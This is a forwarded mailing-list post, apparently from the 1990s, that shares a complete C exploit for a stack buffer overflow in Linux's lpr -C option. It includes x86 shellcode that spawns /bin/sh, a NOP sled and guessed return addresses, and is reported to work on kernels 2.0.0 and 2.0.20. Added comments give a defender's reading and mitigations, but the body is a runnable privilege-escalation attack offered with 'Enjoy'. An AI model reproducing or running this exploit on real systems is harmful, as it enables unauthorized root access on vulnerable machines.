
Linux's lpr exploit (fwd)



Hi there !
Hope you all will like it. If this isn't the place for jokes
like this, please tell me.
 Also, if anybody wants a patch, tell me as well.

                 Enjoy ,
                                    Meir .

All thanx go to Vadim Kolontsov, Tver.

Checked on 2.0.0 and 2.0.20; it worked on both.
-----------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET        50
#define BUFFER_SIZE           1023

/*
 * Return the value of the stack pointer register.
 *
 * The inline assembly copies %esp into %eax, and the function has no
 * return statement, so the caller receives whatever is left in %eax.
 * This depends on 32-bit x86 and on the compiler not touching %eax
 * afterwards; in standard C, using the result of a non-void function
 * that falls off its end is undefined behavior.
 */
long get_esp(void)
{
 __asm__("movl %esp,%eax\n");
}

/*
 * Build one oversized, NUL-terminated string and hand it to /usr/bin/lpr
 * as the value of its -C option.
 *
 * Layout of the string, in order:
 *   1. BUFFER_SIZE - strlen(execshell) bytes of 0x90 (the x86 NOP opcode),
 *   2. the bytes of execshell,
 *   3. two machine words, each holding get_esp() + DEFAULT_OFFSET,
 *   4. a terminating zero byte.
 *
 * Defender's reading: the defect being demonstrated is in lpr, not here.
 * Presumably the affected lpr copies the -C value into a fixed-size stack
 * buffer without a length check -- lpr's source is not shown, confirm
 * against it.  The relevant controls are a bounds-checked (patched) lpr,
 * not installing lpr setuid where that is not required (NOTE(review):
 * whether lpr is setuid on a given system must be checked there), and
 * treating command-line arguments to lpr of roughly 1 KB or more as
 * abnormal.
 */
void main()
{
 char *buff = NULL;
 unsigned long *addr_ptr = NULL;
 char *ptr = NULL;

 /*
  * Opaque machine-code bytes followed by the text "/bin/sh".  The
  * \xcd\x80 pairs are the x86 "int $0x80" encoding; presumably the bytes
  * start that program via a system call -- not disassembled here.
  */
 u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
		        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
		      "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
		      "\xd7\xff\xff\xff/bin/sh";
 int i;

 /* 4096 bytes is well above the BUFFER_SIZE + two words + NUL written below. */
 buff = malloc(4096);
 if(!buff)
 {
    printf("can't allocate memory\n");
    /* NOTE(review): exits with status 0 even though the allocation failed. */
    exit(0);
 }
 ptr = buff;
 /* Pad the front so that padding plus execshell is exactly BUFFER_SIZE bytes. */
 memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
 ptr += BUFFER_SIZE-strlen(execshell);
 /* Copy execshell byte by byte, without its terminating NUL. */
 for(i=0;i < strlen(execshell);i++)
    *(ptr++) = execshell[i];
 /*
  * Append two words derived from this process's own stack pointer.  The
  * value is a guess at an address in the target; what it overwrites
  * depends on lpr's stack frame, which is not visible here.
  */
 addr_ptr = (long *)ptr;
 for(i=0;i<2;i++)
    *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
 ptr = (char *)addr_ptr;
 /* Terminate so the buffer can be passed as an ordinary C string argument. */
 *ptr = 0;
 /* Replace this process with lpr; nothing after this runs if execl succeeds. */
 execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}
--------------------------------------------------------------------------
Vadim Kolontsov                                        SysAdm/Programmer 
Tver Regional Center of New Information Technologies        Networks Lab




Follow-Ups: